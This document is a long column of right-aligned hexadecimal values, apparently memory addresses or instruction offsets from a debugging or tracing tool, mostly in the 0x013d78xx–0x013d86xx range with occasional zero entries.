                                                                          0x013d7864
                                                                          0x013d7866
                                                                          0x00000000
                                                                          0x013d781f
                                                                          0x013d781f
                                                                          0x013d7822
                                                                          0x013d7827
                                                                          0x013d7827
                                                                          0x013d7829
                                                                          0x013d7868
                                                                          0x013d7868
                                                                          0x013d7868
                                                                          0x013d786a
                                                                          0x00000000
                                                                          0x013d782b
                                                                          0x013d782b
                                                                          0x013d782b
                                                                          0x013d782d
                                                                          0x013d786c
                                                                          0x013d786c
                                                                          0x013d786e
                                                                          0x013d7870
                                                                          0x013d7872
                                                                          0x013d7872
                                                                          0x013d7874
                                                                          0x013d7875
                                                                          0x013d787a
                                                                          0x013d7884
                                                                          0x013d788c
                                                                          0x013d7891
                                                                          0x013d789b
                                                                          0x013d789e
                                                                          0x013d78a3
                                                                          0x013d78a4
                                                                          0x013d782f
                                                                          0x013d782f
                                                                          0x013d782f
                                                                          0x013d782f
                                                                          0x00000000
                                                                          0x013d782f
                                                                          0x013d782d
                                                                          0x013d7829
                                                                          0x013d781d
                                                                          0x013d7811
                                                                          0x013d780d
                                                                          0x013d7805
                                                                          0x013d78a8
                                                                          0x013d78aa
                                                                          0x013d78ab
                                                                          0x013d78ac
                                                                          0x013d78ae
                                                                          0x013d78b1
                                                                          0x013d78b6
                                                                          0x013d78bd
                                                                          0x013d78c4
                                                                          0x013d78cb
                                                                          0x013d78d0
                                                                          0x013d78d1
                                                                          0x013d78d4
                                                                          0x013d7f40
                                                                          0x013d7f40
                                                                          0x013d7f45
                                                                          0x013d7f4a
                                                                          0x013d7f4d
                                                                          0x013d7f53
                                                                          0x013d7f54
                                                                          0x013d7f58
                                                                          0x013d78da
                                                                          0x013d78da
                                                                          0x013d78db
                                                                          0x013d78e0
                                                                          0x013d78e0
                                                                          0x00000000
                                                                          0x013d78f1
                                                                          0x013d78f6
                                                                          0x013d78fd
                                                                          0x013d7902
                                                                          0x013d7907
                                                                          0x013d7911
                                                                          0x013d7916
                                                                          0x013d7919
                                                                          0x013d7923
                                                                          0x013d7926
                                                                          0x013d7947
                                                                          0x013d794a
                                                                          0x013d7928
                                                                          0x013d7928
                                                                          0x013d792d
                                                                          0x013d792d
                                                                          0x013d792f
                                                                          0x013d7937
                                                                          0x013d7939
                                                                          0x013d793c
                                                                          0x013d793e
                                                                          0x013d7940
                                                                          0x013d7942
                                                                          0x013d7942
                                                                          0x013d794c
                                                                          0x013d794e
                                                                          0x013d7950
                                                                          0x013d7957
                                                                          0x013d7957
                                                                          0x013d795a
                                                                          0x013d795d
                                                                          0x013d795f
                                                                          0x013d795f
                                                                          0x013d7961
                                                                          0x013d7965
                                                                          0x013d796c
                                                                          0x013d7970
                                                                          0x013d7970
                                                                          0x013d7974
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7976
                                                                          0x013d7979
                                                                          0x013d797b
                                                                          0x013d797c
                                                                          0x013d7981
                                                                          0x013d7986
                                                                          0x013d798b
                                                                          0x013d7990
                                                                          0x013d7993
                                                                          0x013d7998
                                                                          0x013d799b
                                                                          0x013d799e
                                                                          0x013d79a1
                                                                          0x013d79a5
                                                                          0x013d79a8
                                                                          0x013d79a9
                                                                          0x013d79ac
                                                                          0x013d79af
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d79af
                                                                          0x013d79b1
                                                                          0x013d79b6
                                                                          0x013d79bb
                                                                          0x013d79c0
                                                                          0x013d79c5
                                                                          0x013d79c8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d79dc
                                                                          0x013d79e1
                                                                          0x013d79eb
                                                                          0x013d79f0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d79ff
                                                                          0x013d7a04
                                                                          0x013d7a09
                                                                          0x013d7a10
                                                                          0x013d7a15
                                                                          0x013d7a1a
                                                                          0x013d7a24
                                                                          0x013d7a29
                                                                          0x013d7a2e
                                                                          0x013d7a38
                                                                          0x013d7a40
                                                                          0x013d7a42
                                                                          0x013d7a44
                                                                          0x013d7a49
                                                                          0x013d7a49
                                                                          0x013d7a4b
                                                                          0x013d7a50
                                                                          0x013d7a53
                                                                          0x013d7a55
                                                                          0x013d7a56
                                                                          0x013d7a5b
                                                                          0x013d7a65
                                                                          0x013d7a6c
                                                                          0x013d7a6f
                                                                          0x013d7a72
                                                                          0x013d7a73
                                                                          0x013d7a78
                                                                          0x013d7a7d
                                                                          0x013d7a7f
                                                                          0x013d7a82
                                                                          0x013d7a87
                                                                          0x013d7a87
                                                                          0x013d7a89
                                                                          0x013d7a8e
                                                                          0x013d7a91
                                                                          0x013d7a93
                                                                          0x013d7a94
                                                                          0x013d7a9e
                                                                          0x013d7aa3
                                                                          0x013d7aa5
                                                                          0x013d7aa7
                                                                          0x013d7aaa
                                                                          0x013d7aac
                                                                          0x013d7ab1
                                                                          0x013d7ab3
                                                                          0x013d7ab5
                                                                          0x013d7ab6
                                                                          0x013d7abb
                                                                          0x013d7ac0
                                                                          0x013d7ac5
                                                                          0x013d7acf
                                                                          0x013d7ad4
                                                                          0x013d7ad7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7ae6
                                                                          0x013d7aeb
                                                                          0x013d7af0
                                                                          0x013d7afa
                                                                          0x013d7aff
                                                                          0x013d7b04
                                                                          0x013d7b05
                                                                          0x013d7b08
                                                                          0x013d7b0e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7b0e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7eb0
                                                                          0x013d7eb1
                                                                          0x013d7eb6
                                                                          0x013d7eb9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7f5b
                                                                          0x013d7f60
                                                                          0x013d7f62
                                                                          0x013d7f67
                                                                          0x013d7f67
                                                                          0x013d7f69
                                                                          0x013d7fa8
                                                                          0x013d7fa8
                                                                          0x013d7fa9
                                                                          0x013d7faa
                                                                          0x013d7fab
                                                                          0x00000000
                                                                          0x013d7f6b
                                                                          0x013d7f6b
                                                                          0x013d7f6b
                                                                          0x013d7f6d
                                                                          0x013d7fac
                                                                          0x013d7fac
                                                                          0x013d7fad
                                                                          0x013d7fae
                                                                          0x013d7faf
                                                                          0x013d7fb0
                                                                          0x013d7fb1
                                                                          0x013d7fb3
                                                                          0x00000000
                                                                          0x013d7f6f
                                                                          0x013d7f6f
                                                                          0x013d7f6f
                                                                          0x013d7f6f
                                                                          0x013d7f74
                                                                          0x013d7f75
                                                                          0x013d7fb4
                                                                          0x013d7fb4
                                                                          0x013d7fb5
                                                                          0x013d7fbb
                                                                          0x013d7fbb
                                                                          0x00000000
                                                                          0x013d7f77
                                                                          0x013d7f77
                                                                          0x013d7f77
                                                                          0x013d7f7d
                                                                          0x013d7fbc
                                                                          0x013d7fbc
                                                                          0x013d7fbd
                                                                          0x013d7fbe
                                                                          0x00000000
                                                                          0x013d7fc0
                                                                          0x013d7fc0
                                                                          0x00000000
                                                                          0x013d7fc2
                                                                          0x013d7fc2
                                                                          0x013d7fc3
                                                                          0x00000000
                                                                          0x013d7fc3
                                                                          0x013d7fc0
                                                                          0x013d7f7f
                                                                          0x013d7f7f
                                                                          0x013d7f7f
                                                                          0x013d7f7f
                                                                          0x013d7f85
                                                                          0x013d7fc4
                                                                          0x013d7fc4
                                                                          0x00000000
                                                                          0x013d7fc6
                                                                          0x013d7fc6
                                                                          0x00000000
                                                                          0x013d7fc6
                                                                          0x013d7f87
                                                                          0x013d7f87
                                                                          0x013d7f87
                                                                          0x013d7f87
                                                                          0x013d7f89
                                                                          0x013d7f89
                                                                          0x013d7fc8
                                                                          0x013d7fc8
                                                                          0x013d7fce
                                                                          0x00000000
                                                                          0x013d7f8b
                                                                          0x013d7f8b
                                                                          0x013d7f8b
                                                                          0x013d7f8b
                                                                          0x013d7f91
                                                                          0x013d7fd0
                                                                          0x013d7fd0
                                                                          0x013d7fd3
                                                                          0x00000000
                                                                          0x013d7f93
                                                                          0x013d7f93
                                                                          0x013d7f93
                                                                          0x013d7f95
                                                                          0x013d7fd4
                                                                          0x013d7fd4
                                                                          0x013d7fd6
                                                                          0x013d7fd6
                                                                          0x013d7fda
                                                                          0x00000000
                                                                          0x013d7fdc
                                                                          0x013d7fdc
                                                                          0x013d7fdf
                                                                          0x00000000
                                                                          0x013d7fdf
                                                                          0x013d7f97
                                                                          0x013d7f97
                                                                          0x013d7f9a
                                                                          0x013d7f9f
                                                                          0x013d7f9f
                                                                          0x013d7fa1
                                                                          0x013d7fe0
                                                                          0x013d7fe0
                                                                          0x013d7fe2
                                                                          0x013d7fe9
                                                                          0x013d7fec
                                                                          0x013d7fee
                                                                          0x013d7ff0
                                                                          0x013d7ff2
                                                                          0x013d7ff4
                                                                          0x013d7ff6
                                                                          0x013d7ff8
                                                                          0x013d7ffa
                                                                          0x013d7ffa
                                                                          0x013d7ffb
                                                                          0x013d7ffd
                                                                          0x013d7ffd
                                                                          0x013d8000
                                                                          0x013d8000
                                                                          0x013d8006
                                                                          0x013d800a
                                                                          0x013d800f
                                                                          0x013d8013
                                                                          0x013d8015
                                                                          0x013d8017
                                                                          0x013d801a
                                                                          0x013d801b
                                                                          0x013d801b
                                                                          0x013d801b
                                                                          0x013d801c
                                                                          0x013d8022
                                                                          0x013d8022
                                                                          0x013d8022
                                                                          0x013d8023
                                                                          0x013d8023
                                                                          0x013d8024
                                                                          0x013d8029
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d802b
                                                                          0x013d803b
                                                                          0x013d804a
                                                                          0x013d804a
                                                                          0x013d7ffb
                                                                          0x013d7fa3
                                                                          0x013d7fa3
                                                                          0x013d7fa6
                                                                          0x00000000
                                                                          0x013d7fa6
                                                                          0x013d7fa1
                                                                          0x013d7f95
                                                                          0x013d7f91
                                                                          0x013d7f89
                                                                          0x013d7f85
                                                                          0x013d7f7d
                                                                          0x013d7f75
                                                                          0x013d7f6d
                                                                          0x013d8050
                                                                          0x013d8056
                                                                          0x013d805b
                                                                          0x013d8060
                                                                          0x013d806a
                                                                          0x013d806f
                                                                          0x013d8074
                                                                          0x013d807e
                                                                          0x013d8083
                                                                          0x013d808c
                                                                          0x013d8091
                                                                          0x013d8096
                                                                          0x013d80a0
                                                                          0x013d80a5
                                                                          0x013d80ae
                                                                          0x013d80b3
                                                                          0x013d80b8
                                                                          0x013d80c2
                                                                          0x013d80c7
                                                                          0x013d80d0
                                                                          0x013d80da
                                                                          0x013d80db
                                                                          0x013d80e0
                                                                          0x013d80e3
                                                                          0x013d80e6
                                                                          0x013d80e9
                                                                          0x013d811d
                                                                          0x013d8122
                                                                          0x013d8127
                                                                          0x013d812c
                                                                          0x013d8136
                                                                          0x013d813b
                                                                          0x013d8140
                                                                          0x013d814a
                                                                          0x013d814f
                                                                          0x013d8154
                                                                          0x013d815e
                                                                          0x013d8163
                                                                          0x013d8168
                                                                          0x013d8172
                                                                          0x013d8177
                                                                          0x013d8180
                                                                          0x013d8185
                                                                          0x013d818a
                                                                          0x013d8194
                                                                          0x013d8199
                                                                          0x013d81a2
                                                                          0x013d81a7
                                                                          0x013d81ac
                                                                          0x013d81b6
                                                                          0x013d81bb
                                                                          0x013d81c4
                                                                          0x013d81ce
                                                                          0x013d81cf
                                                                          0x013d81d4
                                                                          0x013d81d7
                                                                          0x013d81da
                                                                          0x013d81dd
                                                                          0x013d80eb
                                                                          0x013d80eb
                                                                          0x013d80ee
                                                                          0x013d80f1
                                                                          0x013d80f8
                                                                          0x013d80f8
                                                                          0x013d80fb
                                                                          0x00000000
                                                                          0x013d80fd
                                                                          0x013d80fd
                                                                          0x013d8100
                                                                          0x00000000
                                                                          0x013d8102
                                                                          0x013d8102
                                                                          0x013d8105
                                                                          0x013d810a
                                                                          0x013d810c
                                                                          0x013d810f
                                                                          0x00000000
                                                                          0x013d8111
                                                                          0x013d8111
                                                                          0x013d8117
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8117
                                                                          0x013d810f
                                                                          0x013d8100
                                                                          0x013d80f3
                                                                          0x013d80f3
                                                                          0x013d80f6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d80f6
                                                                          0x013d80f1
                                                                          0x013d81e0
                                                                          0x013d81e3
                                                                          0x013d820d
                                                                          0x013d820d
                                                                          0x013d8212
                                                                          0x013d821c
                                                                          0x013d8221
                                                                          0x013d8223
                                                                          0x013d8228
                                                                          0x013d8232
                                                                          0x013d8237
                                                                          0x013d8239
                                                                          0x013d823e
                                                                          0x013d8248
                                                                          0x013d824d
                                                                          0x013d824f
                                                                          0x013d8254
                                                                          0x013d825e
                                                                          0x013d8263
                                                                          0x013d8265
                                                                          0x013d826a
                                                                          0x013d8274
                                                                          0x013d8279
                                                                          0x013d827c
                                                                          0x013d8282
                                                                          0x013d8285
                                                                          0x013d8288
                                                                          0x013d81e5
                                                                          0x013d81e5
                                                                          0x013d81e8
                                                                          0x013d81ef
                                                                          0x013d81ef
                                                                          0x013d81f2
                                                                          0x00000000
                                                                          0x013d81f4
                                                                          0x013d81f4
                                                                          0x013d81f7
                                                                          0x00000000
                                                                          0x013d81f9
                                                                          0x013d81f9
                                                                          0x013d81fe
                                                                          0x013d8200
                                                                          0x013d8203
                                                                          0x00000000
                                                                          0x013d8205
                                                                          0x013d8205
                                                                          0x013d820b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d820b
                                                                          0x013d8203
                                                                          0x013d81f7
                                                                          0x013d81ea
                                                                          0x013d81ea
                                                                          0x013d81ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d81ed
                                                                          0x013d81e8
                                                                          0x013d8290
                                                                          0x013d8296
                                                                          0x013d829b
                                                                          0x013d82a1
                                                                          0x013d82a6
                                                                          0x013d82ab
                                                                          0x013d82b5
                                                                          0x013d82ba
                                                                          0x013d82bf
                                                                          0x013d82c9
                                                                          0x013d82ce
                                                                          0x013d82d3
                                                                          0x013d82dd
                                                                          0x013d82e2
                                                                          0x013d82e7
                                                                          0x013d82f1
                                                                          0x013d82fb
                                                                          0x013d82fc
                                                                          0x013d8301
                                                                          0x013d8306
                                                                          0x013d8315
                                                                          0x013d831a
                                                                          0x013d831f
                                                                          0x013d8324
                                                                          0x013d8333
                                                                          0x013d8342
                                                                          0x013d834a
                                                                          0x013d834b
                                                                          0x013d834d
                                                                          0x013d8350
                                                                          0x013d8350
                                                                          0x013d8355
                                                                          0x013d8356
                                                                          0x013d8358
                                                                          0x013d835a
                                                                          0x013d835f
                                                                          0x013d8364
                                                                          0x013d8367
                                                                          0x013d836a
                                                                          0x013d836d
                                                                          0x013d837c
                                                                          0x013d837f
                                                                          0x00000000
                                                                          0x013d8381
                                                                          0x013d8381
                                                                          0x013d8384
                                                                          0x013d8387
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8387
                                                                          0x013d836f
                                                                          0x013d836f
                                                                          0x013d8372
                                                                          0x013d8375
                                                                          0x013d8389
                                                                          0x013d8389
                                                                          0x013d8390
                                                                          0x013d8393
                                                                          0x013d8394
                                                                          0x013d8399
                                                                          0x013d839a
                                                                          0x013d839b
                                                                          0x013d83a0
                                                                          0x013d83a3
                                                                          0x013d83a6
                                                                          0x013d83a9
                                                                          0x013d83bb
                                                                          0x013d83bb
                                                                          0x013d83be
                                                                          0x00000000
                                                                          0x013d83c0
                                                                          0x013d83c0
                                                                          0x013d83c3
                                                                          0x013d83c6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d83c6
                                                                          0x013d83ab
                                                                          0x013d83ab
                                                                          0x013d83ae
                                                                          0x013d83ae
                                                                          0x013d83b1
                                                                          0x013d83c8
                                                                          0x013d83c8
                                                                          0x013d83cf
                                                                          0x013d83da
                                                                          0x013d83df
                                                                          0x013d83e2
                                                                          0x013d83e5
                                                                          0x013d83e8
                                                                          0x013d83fa
                                                                          0x013d83fa
                                                                          0x013d83fd
                                                                          0x00000000
                                                                          0x013d83ff
                                                                          0x013d83ff
                                                                          0x013d8402
                                                                          0x013d8405
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8405
                                                                          0x013d83ea
                                                                          0x013d83ea
                                                                          0x013d83ed
                                                                          0x013d83ed
                                                                          0x013d83f0
                                                                          0x013d8407
                                                                          0x013d8407
                                                                          0x013d840e
                                                                          0x013d8411
                                                                          0x013d8412
                                                                          0x013d8417
                                                                          0x013d8418
                                                                          0x013d8419
                                                                          0x013d841e
                                                                          0x013d8421
                                                                          0x013d8424
                                                                          0x013d8427
                                                                          0x013d8439
                                                                          0x013d8439
                                                                          0x013d843c
                                                                          0x00000000
                                                                          0x013d843e
                                                                          0x013d843e
                                                                          0x013d8441
                                                                          0x013d8444
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8444
                                                                          0x013d8429
                                                                          0x013d8429
                                                                          0x013d842c
                                                                          0x013d842c
                                                                          0x013d842f
                                                                          0x013d8446
                                                                          0x013d8446
                                                                          0x013d844d
                                                                          0x013d8450
                                                                          0x013d8451
                                                                          0x013d8456
                                                                          0x013d8457
                                                                          0x013d8458
                                                                          0x013d845d
                                                                          0x013d8460
                                                                          0x013d8463
                                                                          0x013d8466
                                                                          0x013d8478
                                                                          0x013d8478
                                                                          0x013d847b
                                                                          0x00000000
                                                                          0x013d847d
                                                                          0x013d847d
                                                                          0x013d8480
                                                                          0x013d8483
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8483
                                                                          0x013d8468
                                                                          0x013d8468
                                                                          0x013d846b
                                                                          0x013d846b
                                                                          0x013d846e
                                                                          0x013d8485
                                                                          0x013d8485
                                                                          0x013d848c
                                                                          0x013d848f
                                                                          0x013d8490
                                                                          0x013d8495
                                                                          0x013d8496
                                                                          0x013d8497
                                                                          0x013d849c
                                                                          0x013d849f
                                                                          0x013d84a2
                                                                          0x013d84a5
                                                                          0x013d84b7
                                                                          0x013d84b7
                                                                          0x013d84ba
                                                                          0x00000000
                                                                          0x013d84bc
                                                                          0x013d84bc
                                                                          0x013d84bf
                                                                          0x013d84c2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d84c2
                                                                          0x013d84a7
                                                                          0x013d84a7
                                                                          0x013d84aa
                                                                          0x013d84aa
                                                                          0x013d84ad
                                                                          0x013d84c4
                                                                          0x013d84c4
                                                                          0x013d84cb
                                                                          0x013d84ce
                                                                          0x013d84cf
                                                                          0x013d84d4
                                                                          0x013d84d5
                                                                          0x013d84d6
                                                                          0x013d84db
                                                                          0x013d84de
                                                                          0x013d84e1
                                                                          0x013d84e4
                                                                          0x013d84f6
                                                                          0x013d84f6
                                                                          0x013d84f9
                                                                          0x00000000
                                                                          0x013d84fb
                                                                          0x013d84fb
                                                                          0x013d84fe
                                                                          0x013d8501
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8501
                                                                          0x013d84e6
                                                                          0x013d84e6
                                                                          0x013d84e9
                                                                          0x013d84e9
                                                                          0x013d84ec
                                                                          0x013d8503
                                                                          0x013d8503
                                                                          0x013d850a
                                                                          0x013d850d
                                                                          0x013d850e
                                                                          0x013d8513
                                                                          0x013d8514
                                                                          0x013d8515
                                                                          0x013d851a
                                                                          0x013d851d
                                                                          0x013d8520
                                                                          0x013d8523
                                                                          0x013d8535
                                                                          0x013d8535
                                                                          0x013d8538
                                                                          0x00000000
                                                                          0x013d853a
                                                                          0x013d853a
                                                                          0x013d853d
                                                                          0x013d8540
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d8540
                                                                          0x013d8525
                                                                          0x013d8525
                                                                          0x013d8528
                                                                          0x013d8528
                                                                          0x013d852b
                                                                          0x013d8542
                                                                          0x013d8542
                                                                          0x013d8549
                                                                          0x013d854c
                                                                          0x013d854d
                                                                          0x013d8552
                                                                          0x013d8553
                                                                          0x013d8554
                                                                          0x013d8559
                                                                          0x013d855c
                                                                          0x013d855f
                                                                          0x013d8562
                                                                          0x013d8574
                                                                          0x013d8574
                                                                          0x013d8577
                                                                          0x00000000
                                                                          0x013d8579
                                                                          0x013d8579
                                                                          0x013d857c
                                                                          0x013d857f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d857f
                                                                          0x013d8564
                                                                          0x013d8564
                                                                          0x013d8567
                                                                          0x013d8567
                                                                          0x013d856a
                                                                          0x013d8581
                                                                          0x013d8581
                                                                          0x013d8588
                                                                          0x013d858b
                                                                          0x013d858c
                                                                          0x013d8591
                                                                          0x013d8592
                                                                          0x013d8593
                                                                          0x013d8598
                                                                          0x013d859b
                                                                          0x013d859e
                                                                          0x013d85a1
                                                                          0x013d85b3
                                                                          0x013d85b3
                                                                          0x013d85b6
                                                                          0x00000000
                                                                          0x013d85b8
                                                                          0x013d85b8
                                                                          0x013d85bb
                                                                          0x013d85be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d85be
                                                                          0x013d85a3
                                                                          0x013d85a3
                                                                          0x013d85a6
                                                                          0x013d85a6
                                                                          0x013d85a9
                                                                          0x013d85c0
                                                                          0x013d85c0
                                                                          0x013d85c7
                                                                          0x013d85ca
                                                                          0x013d85cb
                                                                          0x013d85d0
                                                                          0x013d85d1
                                                                          0x013d85d2
                                                                          0x013d85d7
                                                                          0x013d85da
                                                                          0x013d85dd
                                                                          0x013d85e0
                                                                          0x013d85f2
                                                                          0x013d85f2
                                                                          0x013d85f5
                                                                          0x00000000
                                                                          0x013d85f7
                                                                          0x013d85f7
                                                                          0x013d85fa
                                                                          0x013d85fd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d85fd
                                                                          0x013d85e2
                                                                          0x013d85e2
                                                                          0x013d85e5
                                                                          0x013d85e5
                                                                          0x013d85e8
                                                                          0x013d85ff
                                                                          0x013d85ff
                                                                          0x013d8606
                                                                          0x013d8609
                                                                          0x013d860a
                                                                          0x013d860f
                                                                          0x013d8610
                                                                          0x013d8611
                                                                          0x013d8616
                                                                          0x013d8619
                                                                          0x013d861c
                                                                          0x013d861f
                                                                          0x013d8631
                                                                          0x013d8631
                                                                          0x013d8634
                                                                          0x013d8636
                                                                          0x00000000
                                                                          0x013d8636
                                                                          0x00000000
                                                                          0x013d8621
                                                                          0x013d8621
                                                                          0x013d8624
                                                                          0x013d8624
                                                                          0x013d8627
                                                                          0x00000000
                                                                          0x013d8629
                                                                          0x013d8629
                                                                          0x013d8629
                                                                          0x013d862e
                                                                          0x013d862e
                                                                          0x013d8627
                                                                          0x013d85ea
                                                                          0x013d85ea
                                                                          0x013d85ea
                                                                          0x013d85ef
                                                                          0x013d85ef
                                                                          0x013d85e8
                                                                          0x013d85ab
                                                                          0x013d85ab
                                                                          0x013d85ab
                                                                          0x013d85b0
                                                                          0x013d85b0
                                                                          0x013d85a9
                                                                          0x013d856c
                                                                          0x013d856c
                                                                          0x013d856c
                                                                          0x013d8571
                                                                          0x013d8571
                                                                          0x013d856a
                                                                          0x013d852d
                                                                          0x013d852d
                                                                          0x013d852d
                                                                          0x013d8532
                                                                          0x013d8532
                                                                          0x013d852b
                                                                          0x013d84ee
                                                                          0x013d84ee
                                                                          0x013d84ee
                                                                          0x013d84f3
                                                                          0x013d84f3
                                                                          0x013d84ec
                                                                          0x013d84af
                                                                          0x013d84af
                                                                          0x013d84af
                                                                          0x013d84b4
                                                                          0x013d84b4
                                                                          0x013d84ad
                                                                          0x013d8470
                                                                          0x013d8470
                                                                          0x013d8470
                                                                          0x013d8475
                                                                          0x013d8475
                                                                          0x013d846e
                                                                          0x013d8431
                                                                          0x013d8431
                                                                          0x013d8431
                                                                          0x013d8436
                                                                          0x013d8436
                                                                          0x013d842f
                                                                          0x013d83f2
                                                                          0x013d83f2
                                                                          0x013d83f2
                                                                          0x013d83f7
                                                                          0x013d83f7
                                                                          0x013d83f0
                                                                          0x013d83b3
                                                                          0x013d83b3
                                                                          0x013d83b3
                                                                          0x013d83b8
                                                                          0x013d83b8
                                                                          0x013d83b1
                                                                          0x013d8377
                                                                          0x013d8639
                                                                          0x013d8639
                                                                          0x013d863c
                                                                          0x013d863e
                                                                          0x013d863e
                                                                          0x013d8645
                                                                          0x013d8648
                                                                          0x013d8649
                                                                          0x013d864e
                                                                          0x013d864f
                                                                          0x013d8650
                                                                          0x013d8655
                                                                          0x013d8655
                                                                          0x013d8658
                                                                          0x013d8658
                                                                          0x013d8658
                                                                          0x013d865d
                                                                          0x013d865d
                                                                          0x013d8375
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7b15
                                                                          0x013d7b1f
                                                                          0x013d7b24
                                                                          0x013d7b29
                                                                          0x013d7b2b
                                                                          0x013d7b30
                                                                          0x013d7b35
                                                                          0x013d7b3f
                                                                          0x013d7b44
                                                                          0x013d7b4e
                                                                          0x013d7b51
                                                                          0x013d7b52
                                                                          0x013d7b53
                                                                          0x013d7b54
                                                                          0x013d7b55
                                                                          0x013d7b5a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7b62
                                                                          0x013d7b6c
                                                                          0x013d7b71
                                                                          0x013d7b76
                                                                          0x013d7b78
                                                                          0x013d7b7d
                                                                          0x013d7b82
                                                                          0x013d7b8c
                                                                          0x013d7b91
                                                                          0x013d7b96
                                                                          0x013d7b9b
                                                                          0x013d7b9e
                                                                          0x013d7b9f
                                                                          0x013d7ba0
                                                                          0x013d7ba1
                                                                          0x013d7ba2
                                                                          0x013d7ba7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7baf
                                                                          0x013d7bb9
                                                                          0x013d7bbe
                                                                          0x013d7bc3
                                                                          0x013d7bc5
                                                                          0x013d7bca
                                                                          0x013d7bcf
                                                                          0x013d7bd9
                                                                          0x013d7bde
                                                                          0x013d7be3
                                                                          0x013d7be8
                                                                          0x013d7beb
                                                                          0x013d7bec
                                                                          0x013d7bed
                                                                          0x013d7bee
                                                                          0x013d7bef
                                                                          0x013d7bf4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7bfc
                                                                          0x013d7c06
                                                                          0x013d7c0b
                                                                          0x013d7c10
                                                                          0x013d7c12
                                                                          0x013d7c17
                                                                          0x013d7c1c
                                                                          0x013d7c26
                                                                          0x013d7c2b
                                                                          0x013d7c35
                                                                          0x013d7c38
                                                                          0x013d7c39
                                                                          0x013d7c3a
                                                                          0x013d7c3b
                                                                          0x013d7c3c
                                                                          0x013d7c41
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7c49
                                                                          0x013d7c53
                                                                          0x013d7c58
                                                                          0x013d7c5d
                                                                          0x013d7c5f
                                                                          0x013d7c64
                                                                          0x013d7c69
                                                                          0x013d7c73
                                                                          0x013d7c78
                                                                          0x013d7c7d
                                                                          0x013d7c82
                                                                          0x013d7c85
                                                                          0x013d7c86
                                                                          0x013d7c87
                                                                          0x013d7c88
                                                                          0x013d7c89
                                                                          0x013d7c8e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7c96
                                                                          0x013d7ca0
                                                                          0x013d7ca5
                                                                          0x013d7caa
                                                                          0x013d7cac
                                                                          0x013d7cb1
                                                                          0x013d7cb6
                                                                          0x013d7cc0
                                                                          0x013d7cc5
                                                                          0x013d7cca
                                                                          0x013d7ccf
                                                                          0x013d7cd2
                                                                          0x013d7cd3
                                                                          0x013d7cd4
                                                                          0x013d7cd5
                                                                          0x013d7cd6
                                                                          0x013d7cdb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7ce3
                                                                          0x013d7ced
                                                                          0x013d7cf2
                                                                          0x013d7cf7
                                                                          0x013d7cf9
                                                                          0x013d7cfe
                                                                          0x013d7d03
                                                                          0x013d7d0d
                                                                          0x013d7d12
                                                                          0x013d7d1c
                                                                          0x013d7d1f
                                                                          0x013d7d20
                                                                          0x013d7d21
                                                                          0x013d7d22
                                                                          0x013d7d23
                                                                          0x013d7d28
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7d30
                                                                          0x013d7d3a
                                                                          0x013d7d3f
                                                                          0x013d7d44
                                                                          0x013d7d46
                                                                          0x013d7d4b
                                                                          0x013d7d50
                                                                          0x013d7d5a
                                                                          0x013d7d5f
                                                                          0x013d7d64
                                                                          0x013d7d69
                                                                          0x013d7d6c
                                                                          0x013d7d6d
                                                                          0x013d7d6e
                                                                          0x013d7d6f
                                                                          0x013d7d70
                                                                          0x013d7d75
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d7d7d
                                                                          0x013d7d87
                                                                          0x013d7d8c
                                                                          0x013d7d91
                                                                          0x013d7d93
                                                                          0x013d7d98
                                                                          0x013d7d9d
                                                                          0x013d7da7
                                                                          0x013d7dac
                                                                          0x013d7db1
                                                                          0x013d7db6
                                                                          0x013d7db9
                                                                          0x013d7dba
                                                                          0x013d7dbb
                                                                          0x013d7dbc
                                                                          0x013d7dbd
                                                                          0x013d7dc2
